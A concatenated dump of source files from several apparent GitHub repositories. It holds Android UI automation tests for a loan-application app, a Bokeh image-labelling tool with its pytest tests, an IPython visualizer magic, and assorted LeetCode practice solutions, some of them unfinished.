d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'申请银行').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='工商银行').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'银行产品').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='抵押贷').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'贷款类型').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='抵押贷').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"申请金额").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text('50000')
# d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text='申请客户').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u'按 揭 员').sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click(timeout=5)
d(text='黄蓉').click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_yes").click(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_edit_title",text='备注:').sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(u"测试数据 - %s" % self.NowTime,timeout=2)
d(resourceId="com.xiaoxiao.ludan:id/right").click(timeout=5)
d(text='提交按揭部').click(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title", text=u'报单详情').exists(timeout=5) == True:
log.info(d.toast.get_message(10, 5))
d(scrollable=True).scroll.to(text="最新进度:")
get_loanID = d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"贷款编号:").sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").get_text(timeout=5)
get_loanCount = d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"申请金额:").sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").get_text(timeout=3)
log.info('贷款编号为:%s' % get_loanID)
log.info('贷款金额为:%s' % get_loanCount)
print('贷款编号为:%s' % get_loanID)
print('贷款金额为:%s' % get_loanCount)
with open(self.loanID_PATH, 'w') as f:
f.write(get_loanID)
else:
log.error('服务器返回:%s' % d.toast.get_message(10, 5))
print('服务器返回:%s' % d.toast.get_message(10, 5))
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title", text=u'报单详情').exists(),msg='服务器返回:%s' % d.toast.get_message(10, 5))
else:
log.error('服务器返回:%s' % d.toast.get_message(10, 5))
print('服务器返回:%s' % d.toast.get_message(10, 5))
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title", text=u'贷款信息').exists(),msg='服务器返回:%s' % d.toast.get_message(10, 5))
else:
log.error('服务器返回:%s' % d.toast.get_message(10, 5))
print('服务器返回:%s' % d.toast.get_message(10, 5))
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title",text='快速报单').exists(),msg='服务器返回:%s' % d.toast.get_message(10, 5))
if __name__ == '__main__':
unittest.main()
```
#### File: examples/com.xiaoxiao.ludan/test_temp.py
```python
import time
import unittest
import uiautomator2 as u2
import uiautomator2.ext.ocr as ocr
import random
from utx import *
class TestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.d = u2.connect()
cls.d.set_orientation('natural')
cls.d.healthcheck()
cls.d.implicitly_wait(10)
cls.d.app_clear("com.xiaoxiao.ludan")
cls.d.app_stop_all()
ocr.API = "http://ocr.open.netease.com/api/ocr"
u2.plugin_register("ocr", ocr.OCR)
def setUp(self):
self.d.set_fastinput_ime(True)
self.sess = self.d.session("com.xiaoxiao.ludan")
def tearDown(self):
self.d.app_clear("com.xiaoxiao.ludan")
self.d.app_stop_all()
# def test_000(self):
# self.d.ext_ocr.all()
# self.d.ext_ocr("登录").click()
# print('OCR')
# output
# ('状态', 138, 1888),
# ('运动', 408, 1888),
# ('发现', 678, 1888),
# ('我的', 948, 1888)]
# d.ext_ocr("我的").click() # 点击带有"我的" 的按钮
# @tag(Tag.temp)
# def test_idcard_generator(self):
# """ 随机生成新的18为身份证号码 """
# ARR = (7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2)
# LAST = ('1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2')
# t = time.localtime()[0]
# x = '%02d%02d%02d%04d%02d%02d%03d' % (
# random.randint(10, 99), random.randint(1, 99), random.randint(1, 99), random.randint(t - 80, t - 18),
# random.randint(1, 12), random.randint(1, 28), random.randint(1, 999))
# y = 0
# for i in range(17):
# y += int(x[i]) * ARR[i]
# IDCard = '%s%s' % (x, LAST[y % 11])
# # birthday = '%s-%s-%s 00:00:00' % (IDCard[6:14][0:4], IDCard[6:14][4: 6], IDCard[6:14][6:8])
# print(IDCard)
# log.info(IDCard)
# return IDCard
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "1004parky/sceptovideo",
"score": 2
} |
#### File: sceptovideo/behavioral_analysis/traintools.py
```python
import numpy as np
from functools import partial
from bokeh.layouts import column, row, layout
from bokeh.models import ColumnDataSource, Slider, Button
from bokeh.themes import Theme
from bokeh.io import show
from bokeh.plotting import figure, output_file, Column
from bokeh.models import DataTable, TableColumn, PointDrawTool, ColumnDataSource, CrosshairTool, CDSView, BooleanFilter
from bokeh.events import DoubleTap
from bokeh.models.widgets import TextInput
from bokeh.palettes import viridis
import segmentation
import bootcamp_utils
def _check_ims(ims):
if not segmentation._check_array_like(ims):
raise RuntimeError("The given ims object is not array like, it is " + str(type(ims)))
[segmentation._check_image_input(im) for im in ims]
def point_label(ims, point_size=3, table_height=200, crosshair_tool_alpha=0.5,
point_tool_color='white'):
_check_ims(ims)
ims = np.array(ims)
max_height = max(np.array([b.shape for b in ims])[:, 0])
max_width = max(np.array([b.shape for b in ims])[:, 1])
point_labels = ColumnDataSource({'x': [], 'y': [], 'frame': []})
def modify_doc(doc):
im_num = [0,]
images = [np.pad(im, ((max_height-im.shape[0], 0), (0, max_width-im.shape[1])), 'constant') for im in ims]
plot, source = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]], return_im=True)
source = source.data_source
booleans = [True if frame == im_num[-1] else False for frame in point_labels.data['frame']]
view = CDSView(source=point_labels, filters=[BooleanFilter(booleans)])
renderer = plot.scatter(x='x', y='y', source=point_labels, view=view,
color=point_tool_color, size=point_size)
columns = [TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field='frame', title='frame')]
table = DataTable(source=point_labels, columns=columns, editable=True, height=table_height)
draw_tool = PointDrawTool(renderers=[renderer], empty_value=im_num[-1])
plot.add_tools(draw_tool)
plot.add_tools(CrosshairTool(line_alpha=crosshair_tool_alpha))
plot.toolbar.active_tap = draw_tool
def update_image(new_ind):
_, data = bootcamp_utils.viz.bokeh_imshow(images[new_ind], return_im=True)
data = data.data_source
source.data = data.data
def callback_point_view(event):
booleans = [True if frame == im_num[-1] else False for frame in point_labels.data['frame']]
view = CDSView(source=point_labels, filters=[BooleanFilter(booleans)])
renderer.view = view
def callback_slider(attr, old, new):
update_image(new)
im_num.append(int(new))
draw_tool.empty_value = im_num[-1]
callback_point_view('tap')
def callback_button(direction):
new = im_num[-1]+direction
if (((len(images) - 1) < new and direction == 1) or
(new == -1 and direction == -1)):
return None
update_image(new)
im_num.append(new)
draw_tool.empty_value = im_num[-1]
callback_point_view('tap')
slider = Slider(start=0, end=len(images), value=0, step=1, title="Frame Number")
slider.on_change('value', callback_slider)
button_back = Button(label='back',button_type="success")
button_back.on_click(partial(callback_button, direction=-1))
button_forward = Button(label='forward',button_type="success")
button_forward.on_click(partial(callback_button, direction=1))
plot.on_event('tap', callback_point_view)
doc.add_root(column(row(slider), plot, row(button_back, button_forward), table))
show(modify_doc)
return point_labels
def button_label(ims, button_values=('beetle', 'ant')):
_check_ims(ims)
ims = np.array(ims)
max_height = max(np.array([b.shape for b in ims])[:, 0])
max_width = max(np.array([b.shape for b in ims])[:, 1])
frame_labels = ColumnDataSource({'type': [],
'frame': []})
def modify_doc(doc):
im_num = [0,]
images = [np.pad(im, ((max_height-im.shape[0],0), (0, max_width-im.shape[1])), 'constant') for im in ims]
plot, source = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]], return_im=True)
source = source.data_source
columns = [TableColumn(field='type', title='type'),
TableColumn(field='frame', title='frame')]
table = DataTable(source=frame_labels, columns=columns, editable=True, height=200)
plot.add_tools(CrosshairTool(line_alpha=0.5))
def callback(attr, old, new):
im_num.append(int(new))
temp_plot, data = bootcamp_utils.viz.bokeh_imshow(images[int(new)], return_im=True)
data = data.data_source
source.data = data.data
plot.x_range.end = temp_plot.x_range.end
#plot.plot_width = temp_plot.plot_width
#layout.children[1] = plot
def callback_button(direction):
if (((len(images) - 2) < im_num[-1] and direction == 1) or
(im_num[-1] == 0 and direction == -1)):
return None
_, data = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]+direction], return_im=True)
im_num.append(im_num[-1]+direction)
data = data.data_source
source.data = data.data
callback_point_view('tap')
def callback_label_button(value):
new_data = {'type': [value],
'frame': [im_num[-1]]}
frame_labels.stream(new_data)
if (len(images) - 2) < im_num[-1]:
return None
_, data = bootcamp_utils.viz.bokeh_imshow(images[im_num[-1]+1], return_im=True)
im_num.append(im_num[-1]+1)
data = data.data_source
source.data = data.data
slider = Slider(start=0, end=len(images)-1, value=0, step=1, title="Frame Number")
slider.on_change('value', callback)
button_back = Button(label='back',button_type="success")
button_back.on_click(partial(callback_button, direction=-1))
button_forward = Button(label='forward',button_type="success")
button_forward.on_click(partial(callback_button, direction=1))
label_buttons = [Button(label=value, button_type='success') for value in button_values]
[button.on_click(partial(callback_label_button, value=value)) for button, value in zip(label_buttons, button_values)]
#for a grid layout of the buttons, we need to pad the list with an empty spot if the button count is not even
if not np.isclose(len(label_buttons) % 2, 0):
label_buttons.append(Button(label=''))
buttons = np.reshape(label_buttons, (-1,2))
buttons = buttons.tolist()
layout_list = [[slider], [plot],
[button_back, button_forward]]
[layout_list.append(button) for button in buttons]
layout_list.append([table])
doc.add_root(layout(layout_list))
show(modify_doc)
return frame_labels
```
#### File: sceptovideo/tests/test_segmentation_pipeline.py
```python
import numpy as np
import sys
sys.path.append("../behavioral_analysis")
import segmentation
import pytest
import skimage.filters
from hypothesis import given
import hypothesis.strategies
import hypothesis.extra.numpy
# test functions for simple segmentation based tracking code
def test_im_shape():
im = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_image_input(im)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_im_data_type_list():
im = [[1, 2, 3], [1, 2, 3]]
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_image_input(im)
excinfo.match("Need to provide a numpy array, image has type <class 'list'>")
def test_im_data_type_string():
im = '[[1, 2, 3], [1, 2, 3]]'
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_image_input(im)
excinfo.match("Need to provide a numpy array, image has type <class 'str'>")
def test_im_shape_segment():
im = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_im_data_type_list_segment():
im = [[1, 2, 3], [1, 2, 3]]
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Need to provide a numpy array, image has type <class 'list'>")
def test_im_data_type_string_segment():
im = '[[1, 2, 3], [1, 2, 3]]'
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Need to provide a numpy array, image has type <class 'str'>")
def test_provided_function_callable():
im = np.array([[1, 2, 3], [1, 2, 3]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im, thresh_func='Hello, world.')
excinfo.match("The provided function is not callable")
def test_provided_function_callable_mat():
im = np.array([[1, 2, 3], [1, 2, 3]])
args = (3,)
assert segmentation._check_function_input(im, skimage.filters.threshold_local, args) == True
def test_provided_function_returns_correct_shape():
im = np.array([[1, 2, 3], [1, 2, 3]])
def bad_func(im):
return(np.array([[1, 2], [1, 2]]))
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im, thresh_func=bad_func)
excinfo.match("Array output of the function must have same shape as the image \
the output array has shape \(2, 2\), image has shape \(2, 3\)")
def test_provided_function_returns_correct_types():
im = np.array([[1, 2, 3], [1, 2, 3]])
def bad_func(im):
return('Hello, world!')
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im, thresh_func=bad_func)
excinfo.match("The provided function must output a numeric or array \
provided function returns type <class 'str'>")
def test_check_numeric_function():
assert segmentation._check_numeric_types(np.int32(1)) == True
def test_bg_subtract_im_type():
im1 = np.array([[1, 2, 3], [1, 2, 3]])
im2 = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.bg_subtract(im1, im2)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_bg_subtract_im_dims():
im1 = np.array([[1, 2, 3], [1, 2, 3]])
im2 = np.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.bg_subtract(im1, im2)
excinfo.match("The provided images have different dimension \
im1: \(2, 3\), im2: \(3, 3\)")
def test_im_normalization_range():
im = np.array([[1, 2, 3], [1, 2, 3]])
new_im = segmentation.normalize_convert_im(im)
assert new_im.max() == 1
assert new_im.min() == 0
@given(hypothesis.extra.numpy.arrays(dtype=int, shape=(50,50)))
def test_im_normalization_range_int(im):
if np.isclose(im.max(), 0) and np.isclose(im.min(), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image is near to zero for all values")
elif np.isclose((im.max() - im.min()), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image has nearly the same value for all pixels. Check input")
else:
new_im = segmentation.normalize_convert_im(im)
assert new_im.max() == 1
assert new_im.min() == 0
@given(hypothesis.extra.numpy.arrays(dtype=float, shape=(50,50)))
def test_im_normalization_range_float(im):
if np.isclose(im.max(), 0) and np.isclose(im.min(), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image is near to zero for all values")
elif np.any(np.isnan(im)):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Data contains a nan, decide how to handle missing data")
elif np.any(np.isinf(im)):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Data contains an np.inf, decide how to handle infinite values")
elif np.isclose((im.max() - im.min()), 0):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Inputed image has nearly the same value for all pixels. Check input")
else:
new_im = segmentation.normalize_convert_im(im)
assert new_im.max() == 1
assert new_im.min() == 0
@given(hypothesis.extra.numpy.arrays(dtype=np.float128, shape=(50,50)))
def test_im_normalization_range_float128(im):
with pytest.raises(RuntimeError) as excinfo:
segmentation.normalize_convert_im(im)
excinfo.match("Provided image has unsuported type: float128")
def test_im_near_zero():
im = np.array([[0, 0, 0], [0, 0, 0]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Inputed image is near to zero for all values")
def test_im_has_nan():
im = np.array([[np.nan, 0, 0], [0, 0, 0]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Data contains a nan, decide how to handle missing data")
def test_im_has_nan():
im = np.array([[np.inf, 0, 0], [0, 0, 0]])
with pytest.raises(RuntimeError) as excinfo:
segmentation.segment(im)
excinfo.match("Data contains an np.inf, decide how to handle infinite values")
def test_int_types():
assert segmentation._check_int_types(1.0) == False
assert segmentation._check_int_types(1) == True
assert segmentation._check_int_types(np.int32(1)) == True
assert segmentation._check_int_types(np.uint64(1)) == True
@given(hypothesis.extra.numpy.arrays(dtype=np.float128, shape=(10,10)))
def test_numpy_array_int_types(ar):
segmentation._check_numpy_array_int_types(ar) == False
@given(hypothesis.strategies.tuples(hypothesis.strategies.integers(), hypothesis.strategies.integers()))
def test_array_like_tuple(tu):
segmentation._check_array_like(tu) == True
@given(hypothesis.strategies.lists())
def test_array_like_list(li):
segmentation._check_array_like(li) == True
@given(hypothesis.extra.numpy.arrays(dtype=np.float128, shape=(10,10)))
def test_array_like_nparray(ar):
segmentation._check_array_like(ar) == True
def test_numpy_array_string_types():
segmentation._check_numpy_array_string_types(np.array(['rectangle', 'ellipse'])) == True
def test_check_roi_inputs():
roi_kind = ['ellipse', 'rectangle']
cent = [1, 2]
width = [1, 2]
height = [1, 2]
outside_roi = 'max'
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs('hello', cent, width, height, outside_roi)
excinfo.match("The given roi kind object is not array like, it is " + str(type('hello')))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, 1, width, height, outside_roi)
excinfo.match("The given roi centers object object is not array like, it is " + str(type(1)))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, 5.0, height, outside_roi)
excinfo.match("The given width object object is not array like, it is " + str(type(5.0)))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, width, '[1.0, 1.2]', outside_roi)
excinfo.match("The given height object object is not array like, it is " + str(type('[1.0, 1.2]')))
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, [1.0, 1.2], width, height, outside_roi)
excinfo.match("The cent object must have entries of integer type")
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, ['1', 2], height, outside_roi)
excinfo.match("The width object must have entries of integer type")
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs(roi_kind, cent, width, [(1, 2), 2], outside_roi)
excinfo.match("The height object must have entries of integer type")
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_roi_inputs([1, 2], cent, width, height, outside_roi)
excinfo.match("The roi_kind object must have entries of type str")
def test_check_crop_inputs():
cent = [1, 2]
width = 20
height = 10
cent = 0
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The given cent object is not array like, it is " + str(type(cent)))
cent = [1, 2.0]
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The cent object must have entries of integer type")
cent = [1, 2]
width = 2.0
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The width must be integer type")
width = 20
height = 2.0
with pytest.raises(RuntimeError) as excinfo:
segmentation._check_crop_inputs(cent, width, height)
excinfo.match("The height must be integer type")
def test_bg_image_maker_string_err():
im = np.array([[0,1], [0,1]])
ims = 'im, im, im'
with pytest.raises(RuntimeError) as excinfo:
segmentation.construct_bg_img(ims)
excinfo.match('Provided ims object is not array like, it is type <class \'str\'>')
def test_bg_image_maker_im_err():
im = np.array(['[0,1]', '[0,1]', '[0,1]'])
ims = [im, im, im]
with pytest.raises(RuntimeError) as excinfo:
segmentation.construct_bg_img(ims)
excinfo.match('Need to provide an array with shape \(n, m\). Provided array has shape \(3,\)')
def test_bg_image_maker_im_err():
im = np.array([[0,1], [0,1]])
ims = [im, im, im]
with pytest.raises(RuntimeError) as excinfo:
segmentation.construct_bg_img(ims, num_ims=10.0)
excinfo.match('Please provide an integer for the num_ims parameter. Provided argument has type ' + str(type(10.0)))
```
#### File: sceptovideo/tests/test_traintools.py
```python
import numpy as np
import sys
sys.path.append("../behavioral_analysis")
import traintools
import pytest
from hypothesis import given
import hypothesis.strategies
import hypothesis.extra.numpy
def test_im_shape():
im = np.array([
[[[1, 2], [1, 2]], [[1, 2], [1, 2]]],
[[[1, 2], [1, 2]], [[1, 2], [1, 2]]]
])
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(im)
excinfo.match("Need to provide an array with shape \(n, m\). Provided array has shape \(2, 2, 2\)")
def test_ims_shape():
ims = np.array([[[1, 2], [1, 2]], [[1, 2], [1, 2]]])
traintools._check_ims(ims)
def test_ims_data_type_list():
ims = [[[1, 2], [1, 2]], [[1, 2], [1, 2]]]
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(ims)
excinfo.match("Need to provide a numpy array, image has type <class 'list'>")
def test_ims_data_type_contrains_string():
ims = np.array([[['1', 2], [1, 2]], [[1, 2], [1, 2]]])
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(ims)
excinfo.match("Provided image has unsuported type: <U1")
def test_im_data_type_string():
im = '[[[1, 2], [1, 2]], [[1, 2], [1, 2]]]'
with pytest.raises(RuntimeError) as excinfo:
traintools._check_ims(im)
excinfo.match("The given ims object is not array like, it is <class 'str'>")
``` |
{
"source": "10051556/mytutor",
"score": 3
} |
#### File: mytutor/testmytutor/__init__.py
```python
from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic,
line_cell_magic)
from IPython.core.magic_arguments import (argument, magic_arguments,
parse_argstring)
from IPython.display import IFrame, display
from urllib.parse import quote
@magics_class
class TestMyTutor(Magics):
@magic_arguments()
@argument('-w',
'--width',
type=int,
default=1100,
help="The width of the output frame (default: 1100).")
@argument('-r', '--run', action='store_true', help="Run cell in IPython.")
@argument('-h',
'--height',
type=int,
default=700,
help="The height of the output frame (default: 700).")
@argument('-lang',
'--language',
type=str,
default='3',
help="The language of the output (default: python3). \n2 = python2 \n3 = python3 \npyanaconda = Anaconda\njava = java")
# @cell_magic
# def mytutor(self, line, cell):
# opts = parse_argstring(self.mytutor, line)
# if opts.run:
# result = self.shell.run_cell(cell)
# url = "https://e-quiz.cs.cityu.edu.hk/opt/cs1302visualize.html#mode=display&code="+quote(cell, safe='')
# display(IFrame(url, width=opts.width, height=opts.height))
@cell_magic
def testmytutor(self, line, cell):
opts = parse_argstring(self.testmytutor, line)
if opts.run:
result = self.shell.run_cell(cell)
url = "https://mytutor.cs.cityu.edu.hk/opt2/cs1302visualize.html#mode=display&py=" + opts.language + "&code=" + quote(cell, safe='')
display(IFrame(url, width=opts.width, height=opts.height))
def load_ipython_extension(ipython):
"""
Register the magics with a running IPython so the magics can be loaded via
`%load_ext testmytutor` or be configured to be autoloaded by IPython at startup time.
"""
ipython.register_magics(TestMyTutor)
``` |
{
"source": "1005281342/learn",
"score": 3
} |
#### File: learn/leetcode/1005.py
```python
class Solution:
def largestSumAfterKNegations(self, A: list, K: int) -> int:
# 分组
M = []
m = []
aa = None
for a in A:
if a > 0:
M.append(a)
elif a < 0:
m.append(a)
else:
aa = a
S_M = sum(M)
lm = len(m)
if M:
M.sort()
# lM = len(M)
if m:
m.sort()
if K <= lm:
return S_M - sum(m[:K]) + sum(m[K:])
elif K > lm:
if aa is None and (K - lm) % 2:
return S_M - sum(m) - 2*min(M+[-x for x in m])
else:
return S_M - sum(m)
if aa is None and (K-lm) % 2:
return sum(M[1:]) - M[0]
else:
return S_M
```
#### File: learn/leetcode/1007.py
```python
class Solution:
def res(self, a, b):
count = 0
for i in range(1, len(a)):
if a[i] != a[0] and b[i] != a[0]:
return -1
elif a[i] != a[0]:
a[i] = b[i]
count += 1
return count
def minDominoRotations(self, A: list, B: list) -> int:
return max(self.res(A[:], B[:]), self.res(B[:], A[:]))
S = Solution()
print(S.minDominoRotations([1,2,1,1,1,2,2,2],[2,1,2,2,2,2,2,2]))
```
#### File: learn/leetcode/1014.py
```python
class Solution:
def shipWithinDays(self, weights: list, D: int) -> int:
w_all = sum(weights)
a = w_all // D
print(a)
res = [0] * D
c = 0
i = 0
for w in weights:
if w >= a:
res[i] = w
i += 1
else:
c += w
if c >= a:
res[i] = c
i += 1
c = 0
else:
res[i] = c
s = sorted(res)
print(s)
c_0 = s.count(0)
if not s[-1 - c_0]:
return max(weights[:]+[s[-1]])
return max([s[-1 - c_0]]+weights[:])
S = Solution()
res = S.shipWithinDays(weights=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 2], D=5)
print(res)
```
#### File: learn/leetcode/1023.py
```python
class Solution:
def queryString(self, S: str, N: int) -> bool:
for x in range(N, -1, -1):
# print(x)
# print(bin(x)[2:])
if bin(x)[2:] not in S:
return False
return True
S = Solution()
s = S.queryString(S="0110", N=4)
print(s)
```
#### File: learn/leetcode/12.py
```python
class Solution:
def get_map(self, char, t):
return char
def intToRoman(self, num: int) -> str:
char_map = {
'I': 1,
'II': 2,
'III': 3,
'IV': 4,
'V': 5,
'VI': 6,
'VII': 7,
'VIII': 8,
'IX': 9,
}
pass
```
#### File: learn/leetcode/14.py
```python
class Solution:
def longestCommonPrefix(self, strs: list) -> str:
if not strs:
return ''
strs.sort(key=len)
# print(strs)
l = len(strs[0])
# status = False
# while l > 0 and not status:
while l > 0:
start = strs[0][:l]
# print(start)
count = 1
for string in strs[1:]:
if start != string[:l]:
l -= 1
break
count += 1
if count == len(strs):
# status = False
return start
return ''
if __name__ == '__main__':
S = Solution()
res = S.longestCommonPrefix(["dog","racecar","car"])
print(res)
```
#### File: learn/leetcode/16.py
```python
class Solution:
# def b_min(self, a, b):
# if abs(a) > abs(b):
# return b
# return a
def b_min(self, a, b):
if abs(a) > abs(b):
return b
return a
def threeSumClosestP(self, nums: list, target: int):
# nums.sort()
m_l = len(nums)
s = 1 << 32
for i in range(m_l-2):
for j in range(i+1, m_l-1):
for k in range(j+1, m_l):
s = self.b_min(s, nums[i]+nums[j]+nums[k]-target)
# print(s)
return s + target
def threeSumClosest(self, num: list, target: int):
num.sort()
m_l = len(num)
if m_l <= 3:
return sum(num)
if m_l <= 140:
return self.threeSumClosestP(num, target)
res_d = dict()
# 初始化一个很远的点在右边
s = 1 << 32
for i in range(m_l - 2):
if i == 0 or num[i] > num[i - 1]:
left = i + 1
right = m_l - 1
# 点重合
if num[i] + num[left] + num[right] == target:
return num[i] + num[left] + num[right]
# 点在左边
elif num[i] + num[left] + num[right] < target:
while left < right:
# s = self.b_min(s, num[i] + num[left] + num[right] - target)
p = abs(num[i] + num[left] + num[right] - target)
if p < s:
s = p
res_d[p] = num[i] + num[left] + num[right]
left += 1
# print(s)
# if num[left] > num[left - 1]:
# break
# 点在右边
else:
while left < right:
# s = self.b_min(s, num[i] + num[left] + num[right] - target)
p = abs(num[i] + num[left] + num[right] - target)
if p < s:
s = p
res_d[p] = num[i] + num[left] + num[right]
right -= 1
# if num[right] < num[right + 1]:
# break
return res_d[min(res_d.keys())]
# class Solution:
#
# def b_min(self, a, b):
# if abs(a) > abs(b):
# return b
# return a
#
# def threeSumClosest(self, nums: list, target: int):
# # nums.sort()
# m_l = len(nums)
# s = 1 << 32
# for i in range(m_l-2):
# for j in range(i+1, m_l-1):
# for k in range(j+1, m_l):
# s = self.b_min(s, nums[i]+nums[j]+nums[k]-target)
# # print(s)
#
# return s + target
S = Solution()
# print(S.threeSumClosest([0, 2, 1, -3], 1)) # 0
print(S.threeSumClosest([-1, 2, 1, -4], 1)) # 2
# print(S.threeSumClosest([1,2,4,8,16,32,64,128], 82)) # 82
print(S.threeSumClosest([56,57,-47,-14,23,31,20,39,-51,7,-4,43,-53,32,24,56,-28,90,-75,-6,21,-100,41,-84,95,95,44,84,70,-22,-86,-6,90,-87,65,-28,-29,-94,98,-28,-100,23,-25,6,-56,-54,-5,53,-88,-25,-31,-71,-13,-62,73,-35,-78,16,99,97,84,-27,-43,-50,18,-16,-61,7,-17,16,-92,28,43,-38,-33,-27,84,-72,-100,-91,-97,-99,59,-63,73,99,98,-100,-37,-80,3,18,93,-81,12,-75,-43,99,10,10,-6,13,0,76,-82,-5,27,-38,-81,77,-55,-100,90,-32,-25,-15,-16,68,-6,87,65,-38,82,78,-61,87,-72,46,50,-60,86,39,69,85,-49,28], -289)) # 82
```
#### File: learn/leetcode/17.py
```python
from itertools import product
class Solution:
def letterCombinations(self, digits: str) -> list:
# 创建字母对应的字符列表的字典
dic = {2: ['a', 'b', 'c'],
3: ['d', 'e', 'f'],
4: ['g', 'h', 'i'],
5: ['j', 'k', 'l'],
6: ['m', 'n', 'o'],
7: ['p', 'q', 'r', 's'],
8: ['t', 'u', 'v'],
9: ['w', 'x', 'y', 'z'],
}
# 存储结果的数组
ret_str = []
if len(digits) == 0:
return []
# 递归出口,当递归到最后一个数的时候result拿到结果进行for循环遍历
if len(digits) == 1:
return dic[int(digits[0])]
# 递归调用, 每次移动一位
result = self.letterCombinations(digits[1:])
# result是一个数组列表,遍历后字符串操作,加入列表
for r in result:
for j in dic[int(digits[0])]:
ret_str.append(j + r)
return ret_str
# if len(digits) == 1:
# return list(d[digits])
#
# x = ['']
# for char in digits:
# if char in {'7', '9'}:
# x *= 4
# else:
# x *= 3
# # print(x)
# # l_x = len(x)
# for v in digits:
# l_v = len(d[v])
# # print(l_v)
# for i in range(l_v):
# for ii, j in enumerate(d[v]):
# # print(j)
# x[i * l_v + ii] += j
# for bb in product(x):
# print(bb)
# return x
S = Solution()
print(S.letterCombinations("23"))
```
#### File: learn/leetcode/19.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def get_length(self, head: ListNode):
c = 0
pre = head
while pre.next is not None:
c += 1
pre = pre.next
return c
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
c = self.get_length(head)
if c <= 1:
head = head.next
return head
index = c-n
i = 0
pre = head
while pre.next is not None:
if i == index:
pre.next = pre.next.next
break
pre = pre.next
i += 1
return head
```
#### File: learn/leetcode/5_.py
```python
class Solution:
def longestPalindrome(self, s: str) -> str:
r_s = ''.join(reversed(s))
print(r_s)
S = Solution()
